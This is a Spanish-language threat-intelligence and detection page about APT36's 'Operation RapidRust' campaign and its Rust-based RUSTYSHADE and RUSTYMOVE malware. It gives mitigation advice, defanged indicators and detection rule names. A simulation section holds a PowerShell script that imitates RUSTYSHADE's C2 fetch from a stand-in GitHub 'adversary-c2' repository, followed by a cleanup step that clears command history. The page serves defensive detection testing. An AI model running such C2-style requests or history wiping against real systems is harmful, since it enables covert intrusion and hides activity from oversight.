APT36 Lanza la Operación RapidRust con RUSTYSHADE y RUSTYMOVE
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El actor de amenaza vinculado a Pakistán APT36 está llevando a cabo una campaña denominada Operación RapidRust contra organizaciones gubernamentales y de defensa. El grupo ha introducido nuevo malware basado en Rust, incluyendo la puerta trasera RUSTYSHADE y la herramienta de propagación RUSTYMOVE. APT36 también utiliza scripts especializados para el robo de archivos, PSNATCH y BASHNATCH, para recopilar y exfiltrar datos a través de repositorios privados de GitHub.
Investigación
Zscaler ThreatLabz identificó nuevas familias de malware y herramientas post-compromiso utilizadas por APT36 en agosto de 2026. La investigación reveló que RUSTYSHADE abusa de la API REST de GitHub para comando y control y utiliza dominios con errores tipográficos para la puesta en escena de cargas útiles. Los investigadores también observaron intentos de movimiento lateral y la propagación de RUSTYMOVE a través de medios removibles para alcanzar entornos aislados.
Mitigación
Las organizaciones deben monitorear el uso no autorizado de la API de GitHub y conexiones salientes inusuales a servicios de almacenamiento en la nube como Backblaze. Se deben aplicar controles estrictos en medios removibles, mientras que deben detectarse tareas programadas sospechosas que se hagan pasar por actualizaciones legítimas. El monitoreo de endpoints también debería identificar la ejecución no autorizada de scripts de PowerShell o Bash y actividad inusual de exfiltración de archivos.
Respuesta
Si se detecta actividad maliciosa, se deben aislar inmediatamente los endpoints afectados en Windows y Linux para prevenir el movimiento lateral y la exfiltración de datos. Los respondedores deben inspeccionar tareas programadas y buscar archivos como DriverInstaller.zip or Automata-20.exe. Los registros de red también deben revisarse para detectar conexiones a theprints[.]org, indiatodays[.]org, y actividad sospechosa de la API de GitHub que se origine en el entorno.
Flujo de ataque
Todavía estamos actualizando esta parte.
Detecciones
Posibilidad de Ejecución a través de Líneas de Comando de PowerShell Ocultas (vía cmdline)
Descarga o Carga a través de Powershell (vía cmdline)
Posible Descubrimiento de Sistemas Remotos o Verificación de Conectividad (vía cmdline)
Posible Descubrimiento de Recursos Compartidos de Red (vía cmdline)
Posible Enumeración de Cuentas de Admin o Grupos (vía cmdline)
Posible Descubrimiento de la Configuración de Red del Sistema (vía cmdline)
Ejecución Sospechosa desde el Perfil de Usuario Público (vía process_creation)
Posible Creación de Tarea Programada (vía powershell)
Posible Intento de Comunicaciones de Consulta de Dominio IP (vía dns)
IOCs (HashSha256) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH
IOCs (HashSha1) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH
IOCs (HashMd5) para detectar: Operación RapidRust: APT36 Despliega RUSTYSHADE, RUSTYMOVE, PSNATCH, y BASHNATCH
Comunicación C2 de RUSTYSHADE a través de la API de GitHub [Conexión de Red de Windows]
Detección de Actividad de RUSTYSHADE y RUSTYMOVE a través de PowerShell [Windows Powershell]
Ejecución de Simulación
-
Narrativa del Ataque y Comandos: El adversario ha desplegado con éxito un implante similar a RUSTYSHADE en una estación de trabajo de Windows. Para recibir instrucciones adicionales, el implante debe comunicarse con su C2 alojado en GitHub. El implante intentará alcanzar un repositorio específico para obtener una carga útil. Para evitar filtros perimetrales básicos que podrían bloquear el acceso anónimo a la API, el implante utiliza un Token de Acceso Personal (PAT) codificado que se pasa a través del
Authorization: token <TOKEN>encabezado. Esta acción está destinada a parecerse a una herramienta legítima de desarrollo que obtiene metadatos de repositorio, pero la combinación específica del URL del repositorio y eltokenprefijo en el encabezado activará la regla de detección. -
Script de Prueba de Regresión:
# Script de simulación para imitar la comunicación C2 de RUSTYSHADE # Este script genera una solicitud que coincide con la lógica de detección: # 1. La URL contiene 'api.github.com/repos/' # 2. El encabezado contiene 'Authorization: token' $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json" $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz" # Construyendo el encabezado para coincidir con la cadena exacta 'token' requerida por la regla $headers = @{ "Authorization" = "token $fakeToken" "User-Agent" = "RUSTYSHADE-Implant/1.0" } Write-Host "Intentando comunicación C2 a $targetUrl..." try { # Usamos -ErrorAction SilentlyContinue porque la URL es falsa y devolverá 404, # pero el proxy aún registrará el intento de solicitud. Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue Write-Host "Solicitud de simulación enviada con éxito." } catch { Write-Host "Solicitud enviada (Error esperado debido a URL falsa, pero los registros del proxy deben capturar el intento)." } -
Comandos de Limpieza:
# No se realizaron cambios persistentes en el sistema; # sin embargo, borramos el historial de comandos por limpieza. Clear-History